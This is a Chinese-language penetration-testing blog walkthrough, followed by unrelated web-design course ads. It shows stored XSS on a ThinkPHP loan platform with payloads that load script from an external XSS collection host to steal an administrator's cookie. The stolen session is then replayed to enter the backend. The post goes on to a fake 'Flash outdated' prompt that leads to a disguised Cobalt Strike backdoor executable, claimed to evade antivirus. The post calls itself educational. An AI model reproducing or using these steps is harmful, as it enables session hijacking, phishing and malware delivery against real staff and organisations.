整合營(yíng)銷服務(wù)商
電腦端+手機(jī)端+微信端=數(shù)據(jù)同步管理
免費(fèi)咨詢熱線:
電腦端+手機(jī)端+微信端=數(shù)據(jù)同步管理
免費(fèi)咨詢熱線:
請(qǐng)注意:
本文僅用于技術(shù)討論與研究,對(duì)于所有筆記中復(fù)現(xiàn)的這些終端或者服務(wù)器,都是自行搭建的環(huán)境進(jìn)行滲透的。我將使用Kali Linux作為此次學(xué)習(xí)的攻擊者機(jī)器。這里使用的技術(shù)僅用于學(xué)習(xí)教育目的,如果列出的技術(shù)用于其他任何目標(biāo),本站及作者概不負(fù)責(zé)。
名言:
你對(duì)這行的興趣,決定你在這行的成就!
2021最新整理網(wǎng)絡(luò)安全\滲透測(cè)試/安全學(xué)習(xí)(全套視頻、大廠面經(jīng)、精品手冊(cè)、必備工具包)一>關(guān)注我,私信回復(fù)“資料”獲取<一
網(wǎng)絡(luò)釣魚是社會(huì)工程學(xué)攻擊方式之一,主要是通過(guò)對(duì)受害者心理弱點(diǎn)、本能反應(yīng)、好奇心、信任、貪婪等心理陷阱進(jìn)行諸如欺騙、傷害等危害手段!
網(wǎng)絡(luò)釣魚攻擊是個(gè)人和公司在保護(hù)其信息安全方面面臨的最常見(jiàn)的安全挑戰(zhàn)之一。無(wú)論是獲取密碼等,還是其他敏感信息,黑客都在使用電子郵件、社交媒體、電話和任何可能的通信方式竊取有價(jià)值的數(shù)據(jù)。
網(wǎng)絡(luò)釣魚攻擊的興起對(duì)所有組織都構(gòu)成了重大威脅。重要的是,如果他們要保護(hù)自己的信息,所有組織都應(yīng)該知道如何發(fā)現(xiàn)一些最常見(jiàn)的網(wǎng)絡(luò)釣魚騙局。同樣還要熟悉攻擊者用來(lái)實(shí)施這些騙局的一些最常見(jiàn)的技術(shù)類型。
這篇主要演示如何利用XSS植入釣魚,獲得管理員內(nèi)部電腦權(quán)限!
黑客(攻擊者):
IP:192.168.1.9
系統(tǒng):kali.2020.4
kali上作為cs的服務(wù)端!
VPS服務(wù)器:
thinkphp平臺(tái)地址:http://test1.dayuixiyou.cn/
釣魚地址:http://flash.dayuixiyou.cn
辦公電腦:
系統(tǒng):windwos7
雙網(wǎng)卡:
192.168.175.153
10.10.1.5
目前kali上運(yùn)行了Cobalt strike ,攻擊者在自己的公網(wǎng)VPS服務(wù)器上制作了后門頁(yè)面釣魚,通過(guò)滲透發(fā)現(xiàn)thinkphp貸款平臺(tái)頁(yè)面存在XSS漏洞利用,通過(guò)插入XSS-js代碼,植入鏈接,最終黑客控制管理員辦公電腦的過(guò)程!!
此次演示貸款thinkphp平臺(tái)在公網(wǎng)服務(wù)器上!
進(jìn)入個(gè)人中心!
注冊(cè)用戶名密碼!
登錄用戶名密碼后,普通用戶界面!點(diǎn)擊設(shè)置!
輸入結(jié)算信息,測(cè)試下!
輸入:
測(cè)試結(jié)果修改成功!查看下前端…
查看源代碼-編輯后查看到?jīng)]變動(dòng),XSS代碼還是存在…說(shuō)明存在XSS攻擊
https://xss.pt/xss.php?do=login
進(jìn)入XSS利用平臺(tái),google也有很多別的平臺(tái)!!
隨意注冊(cè)一個(gè)賬號(hào)!
創(chuàng)建一個(gè)新的項(xiàng)目,隨意填寫!
選擇Keepsession保持會(huì)話!
下一步!
會(huì)彈出需要執(zhí)行的XSS利用代碼…選擇標(biāo)準(zhǔn)代碼測(cè)試!
</tExtArEa>'"><sCRiPt sRC=https://xss.pt..aJ></sCrIpT>
</tExtArEa>'"><sCRiPt sRC=https://xss.pt/..aJ></sCrIpT>
這一段就是payload!將XSS連接信息返回到https://xss.pt平臺(tái)上!
提交信息后,可看到網(wǎng)絡(luò)net中XSS執(zhí)行成功了…
執(zhí)行成功,那么XSS平臺(tái)就收到了信息,可看到!
點(diǎn)擊提現(xiàn)…
申請(qǐng)結(jié)算,成功后,會(huì)將XSS執(zhí)行代碼轉(zhuǎn)發(fā)到后臺(tái)結(jié)算該模塊中!
當(dāng)后臺(tái)管理員訪問(wèn)管理界面,給客戶結(jié)算資金的時(shí)候,點(diǎn)擊提現(xiàn)申請(qǐng)模塊!就會(huì)執(zhí)行XSS植入的代碼!!
這時(shí)候,就返回了管理員的cookie和URL信息!
目錄掃描獲得管理后臺(tái)登錄頁(yè)面,通過(guò)Burp suite轉(zhuǎn)包攔截后!
將XSS平臺(tái)獲取XSS漏洞植入代碼返回的包中,修改其中的url和cookie信息!
send執(zhí)行后,通過(guò)cookie進(jìn)入到了管理員后臺(tái)!
復(fù)制URL!
瀏覽器中訪問(wèn)后,正常進(jìn)入管理員后臺(tái)!
在公網(wǎng)服務(wù)器搭建釣魚頁(yè)面,任何能訪問(wèn)互聯(lián)網(wǎng)客戶都可以訪問(wèn)該頁(yè)面!
利用Cobal Strike生成C#語(yǔ)言的shell…
利用該shell進(jìn)行混淆,并利用python的tinyaes模塊混淆也行,在來(lái)個(gè)分離免殺,最后利用pyinstaller生成exe外殼…必過(guò)全國(guó)殺毒軟件!(不演示過(guò)程)
將flash修改名字為:flashplayer_install_cn.exe(或者修改為update等吸引人下載的名稱都行)
這是Flash貸款平臺(tái)源碼文件目錄!!
修改index.html代碼,找到其中href="進(jìn)行修改為:flashplayer_install_cn.exe
意思就是點(diǎn)擊頁(yè)面立即下載就能自動(dòng)下載目錄下的exe后門文件!
在準(zhǔn)備個(gè)js文件,意思是執(zhí)行該js后,會(huì)在頁(yè)面提示:
您的 FLASH 版本過(guò)低,嘗試升級(jí)后訪問(wèn)該頁(yè)面!
并訪問(wèn)到該頁(yè)面:http://flash.dayuixiyou.cn/
將exe和js都上傳到功能網(wǎng)服務(wù)器apache底層!
測(cè)試訪問(wèn)可看到正常讀取,確保內(nèi)網(wǎng)管理員能執(zhí)行XSS后訪問(wèn)到j(luò)s文件,這里就可以開(kāi)始了!
可看到利用(三)中XSS利用的方法,執(zhí)行插入:
“><”
#需要前后加入閉合 “> <”
當(dāng)"立即提交" 后直接執(zhí)行了XSS植入的js文件,并提示了js中的內(nèi)容!!
然后點(diǎn)確定后,直接跳轉(zhuǎn)到flash頁(yè)面!
和(三)中的方法一樣,需要在后臺(tái)管理頁(yè)面也執(zhí)行XSS,需要結(jié)算金額,讓管理員去結(jié)算的時(shí)候點(diǎn)擊執(zhí)行XSS!
5、執(zhí)行XSS下載flash
可看到內(nèi)網(wǎng)管理員上班期間,登錄到管理后臺(tái),登錄管理員用戶后,工作職責(zé)需要給客戶結(jié)算金額,點(diǎn)擊了提現(xiàn)申請(qǐng),一般客戶安全意識(shí)極差!!
點(diǎn)擊完成后,出現(xiàn)了您的 FLASH 版本過(guò)低,嘗試升級(jí)后訪問(wèn)該頁(yè)面!,一般情況下都會(huì)點(diǎn)擊確認(rèn)!
確認(rèn)后跳轉(zhuǎn)到flash頁(yè)面,逼真的頁(yè)面!!點(diǎn)擊立即下載!!
這里有個(gè)20.1MB的大小信息,這里簡(jiǎn)單在html修改下數(shù)字和EXE內(nèi)容大小即可!
可看到下載了該后門,這里圖標(biāo)我沒(méi)修改,google或者百度利用Folder Changer修改成flash安裝包的圖標(biāo)更逼真!!
這里的exe是全免殺的,殺毒軟件都無(wú)法放行!!
6、成功XSS釣魚
執(zhí)行安裝!
成功在kali攻擊機(jī)上的CS上線,可看到獲取到了管理員電腦的權(quán)限!!
這里通過(guò)滲透中,找到了某平臺(tái)的XSS漏洞,利用XSS漏洞植入代碼執(zhí)行,誘騙到了對(duì)方客服或者管理員的內(nèi)網(wǎng)電腦權(quán)限!
其中最少需要熟悉如何搭站、HTML、js、域名、XSS、免殺、CS4等等知識(shí)才可搭建!
那么很多人都說(shuō)flash都是經(jīng)典的釣魚漏洞了,全國(guó)警惕性都會(huì)高很多,那么我還是老話,提供的是思路,如果是一個(gè)破解軟件,一個(gè)購(gòu)買網(wǎng)站,一個(gè)利用虛榮心或者是貪小便宜的購(gòu)物頁(yè)面,等等進(jìn)行釣魚,進(jìn)行各類的植入的話,那有多少人會(huì)中招?
希望大家提高安全意識(shí),沒(méi)有網(wǎng)絡(luò)安全就沒(méi)有國(guó)家安全!
雖然基礎(chǔ),但是必須牢記于心。
人們常說(shuō)隔行如隔山,對(duì)于很多零基礎(chǔ)想要學(xué)網(wǎng)頁(yè)設(shè)計(jì)的人來(lái)說(shuō),覺(jué)得這是一門非常復(fù)雜難懂的學(xué)科,讓很多想要學(xué)習(xí)這門學(xué)科的人望而卻步。
隨著IT技術(shù)的高速發(fā)展,行業(yè)對(duì)網(wǎng)頁(yè)設(shè)計(jì)人才需求不斷增加,各大網(wǎng)站、廣告公司、設(shè)計(jì)公司都在大量招聘網(wǎng)頁(yè)設(shè)計(jì)人員。目前網(wǎng)頁(yè)設(shè)計(jì)是發(fā)展前景最好,人才需求巨大的行業(yè)之一。據(jù)統(tǒng)計(jì),我國(guó)目前從事網(wǎng)頁(yè)設(shè)計(jì)的人員不多,而專門設(shè)計(jì)網(wǎng)頁(yè)的人才只有幾萬(wàn)人。因此,未來(lái)網(wǎng)頁(yè)設(shè)計(jì)行業(yè)對(duì)人才的需求會(huì)不斷上升,隨之衍生的網(wǎng)頁(yè)設(shè)計(jì)行業(yè)其他職位的就業(yè)前景也會(huì)非常好。
30秒測(cè)試你適不適合學(xué)網(wǎng)頁(yè)設(shè)計(jì):
http://www.tianhujy.com/list-93-1.html?wm=tt_lyt_wysj (復(fù)制到網(wǎng)址框打開(kāi))
成為網(wǎng)頁(yè)設(shè)計(jì)師需要學(xué)靜態(tài)網(wǎng)頁(yè):
Dreamweaver CS4:網(wǎng)頁(yè)布局、制作;Html&Css簡(jiǎn)介;網(wǎng)站管理與維護(hù)、上傳與下載;案例分析
Fireworks:美工設(shè)計(jì)、網(wǎng)頁(yè)配色;CI、LOGO、Banner的制作;常見(jiàn)網(wǎng)頁(yè)動(dòng)畫制作、網(wǎng)頁(yè)布局
Flash CS4:經(jīng)典網(wǎng)頁(yè)動(dòng)畫、廣告、片頭、賀卡設(shè)計(jì)與分析;MTV制作、交互式網(wǎng)站簡(jiǎn)介
Photoshop CS4:Photoshop操作基礎(chǔ)、圖像優(yōu)化處理、經(jīng)典實(shí)例分析與制作、gif動(dòng)畫、廣告gif圖片
Illustrator CS4:廣告招牌制作、燈箱廣告、服裝廣告設(shè)計(jì)、企業(yè)徽標(biāo)設(shè)計(jì)、名片設(shè)計(jì)
成為網(wǎng)頁(yè)設(shè)計(jì)師需要學(xué)動(dòng)態(tài)網(wǎng)頁(yè):
Html語(yǔ)言詳細(xì)解介、CSS樣式、IIS、C#語(yǔ)言、Asp. net動(dòng)態(tài)、SQLServer數(shù)據(jù)庫(kù)、Access數(shù)據(jù)(送)、JavaScript、Flash8.0高級(jí)編程、網(wǎng)站籌劃、網(wǎng)站推廣、電子購(gòu)物車、ChatRoom、BBS制作。注:此部分基本上是程序員工作,并不是網(wǎng)頁(yè)設(shè)計(jì)師所要學(xué)會(huì)的。
零基礎(chǔ)新手如何學(xué)習(xí)網(wǎng)頁(yè)設(shè)計(jì)?
(1).首先要精通設(shè)計(jì)軟件,把Photoshop玩轉(zhuǎn),這是網(wǎng)頁(yè)設(shè)計(jì)的主力工具!
(2).深入學(xué)習(xí)排版設(shè)計(jì)、色彩構(gòu)成,掌握視覺(jué)基礎(chǔ)規(guī)律(構(gòu)成、透視、光影)
(3).掌握網(wǎng)頁(yè)設(shè)計(jì)規(guī)范,了解常見(jiàn)的網(wǎng)頁(yè)布局形式,學(xué)習(xí)交互設(shè)計(jì)等基礎(chǔ)知識(shí)。
(4).了解前端代碼HTML、CSS、JS、JQuery的運(yùn)用,學(xué)一款代碼編輯軟件(如:Dreamweaver)
(5).了解你設(shè)計(jì)網(wǎng)站的公司及產(chǎn)品,熟悉這個(gè)公司及其產(chǎn)品面向的人群!
(6).拓展學(xué)習(xí)網(wǎng)站優(yōu)化、開(kāi)發(fā)、后臺(tái)數(shù)據(jù)處理常識(shí)(加分項(xiàng)目!)
前四個(gè)是基本功,后面的是加分項(xiàng)。越靠前越重要!
給自己制作個(gè)學(xué)習(xí)規(guī)劃也是很重要的,推薦這里:
http://www.tianhujy.com/tg-81.html?wm=tt_lyt_wysj (復(fù)制到網(wǎng)址框打開(kāi))
網(wǎng)頁(yè)的代碼等確實(shí)晦澀難懂,但是只要你有耐心和恒心堅(jiān)持學(xué)下去,入門之后就是一馬平川,會(huì)覺(jué)得越學(xué)越簡(jiǎn)單,越學(xué)越輕松。
著國(guó)內(nèi)互聯(lián)網(wǎng)的快速發(fā)展,中國(guó)網(wǎng)民的數(shù)量大量的增加。所以很多人通過(guò)互聯(lián)網(wǎng)去實(shí)現(xiàn)自己的要求。比如說(shuō)現(xiàn)在很流行的網(wǎng)購(gòu)、通過(guò)招聘網(wǎng)站進(jìn)行求職等等,隨著社會(huì)的發(fā)展,人們的生活會(huì)更加的依賴網(wǎng)絡(luò)。因此每個(gè)人,每個(gè)公司都想去做網(wǎng)站,個(gè)人通過(guò)網(wǎng)站推廣自己、公司通過(guò)網(wǎng)站推廣公司的品牌與知名度、獲得更大的利益化。所以學(xué)網(wǎng)頁(yè)設(shè)計(jì)有沒(méi)有前途顯而易見(jiàn)。
30秒測(cè)試你適不適合學(xué)網(wǎng)頁(yè)設(shè)計(jì):
http://www.tianhujy.com/list-93-1.html?wm=tt_lyt_wysj (可復(fù)制到網(wǎng)址框打開(kāi)哦)
*請(qǐng)認(rèn)真填寫需求信息,我們會(huì)在24小時(shí)內(nèi)與您取得聯(lián)系。
